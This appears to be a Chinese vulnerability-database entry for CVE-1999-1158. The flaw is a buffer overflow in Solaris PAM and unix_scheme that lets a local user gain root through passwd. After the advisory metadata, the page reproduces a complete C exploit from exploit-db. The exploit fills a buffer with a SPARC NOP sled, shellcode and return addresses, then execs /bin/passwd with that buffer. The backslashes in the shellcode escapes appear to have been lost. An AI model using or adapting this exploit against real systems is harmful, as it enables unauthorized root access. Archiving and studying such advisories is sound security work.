Solaris pluggable authentication module(PAM),unix_scheme漏洞

Solaris pluggable authentication module(PAM),unix_scheme漏洞

漏洞ID 1105284 漏洞类型 缓冲区溢出
发布时间 1997-02-25 更新时间 1997-05-13
图片[1]-Solaris pluggable authentication module(PAM),unix_scheme漏洞-安全小百科CVE编号 CVE-1999-1158
图片[2]-Solaris pluggable authentication module(PAM),unix_scheme漏洞-安全小百科CNNVD-ID CNNVD-199705-013
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19158
https://www.securityfocus.com/bid/83036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-013
|漏洞详情
(1)Solaris2.5.1和2.5版本上运行的pluggableauthenticationmodule(PAM)和(2)Solaris2.4和2.3版本上运行的unix_scheme存在漏洞。本地用户可以通过使用如passwd、yppasswd和nispasswd的模块的程序获得根权限。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/201/info

There is a buffer overflow condition on arguments in Pluggable Authentication Modules (PAM) and unix_scheme (5.4 and 5.3). Therefore, an unauthorized user could exploit this vulnerability via the passwd program to gain root access. Under SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable. Under SunOS 5.4 and 5.3, passwd, yppasswd, and nispasswd are separate programs but they dynamically link unix_scheme and are affected. 
*/

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"x82x10x20xcaxa6x1cxc0x13x90x0cxc0x13x92x0cxc0x13"
"xa6x04xe0x01x91xd4xffxffx2dx0bxd8x9axacx15xa1x6e"
"x2fx0bxdcxdax90x0bx80x0ex92x03xa0x08x94x1ax80x0a"
"x9cx03xa0x10xecx3bxbfxf0xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd4xffxff"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf,(char *) 0);
  perror("execl failed");
}
|受影响的产品
Sun Solaris 2.5.1

Sun Solaris 2.5

Sun Solaris 2.4

Sun Solaris 2.3

|参考资料

来源:SUN
名称:00139
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/139&type=0&nav=sec.sba
来源:AUSCERT
名称:AA-97.09
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.09.Solaris.passwd.buffer.overrun.vul

相关推荐: Berkeley Sendmail Daemon Mode Vulnerability

Berkeley Sendmail Daemon Mode Vulnerability 漏洞ID 1105159 漏洞类型 Input Validation Error 发布时间 1996-11-16 更新时间 1996-11-16 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享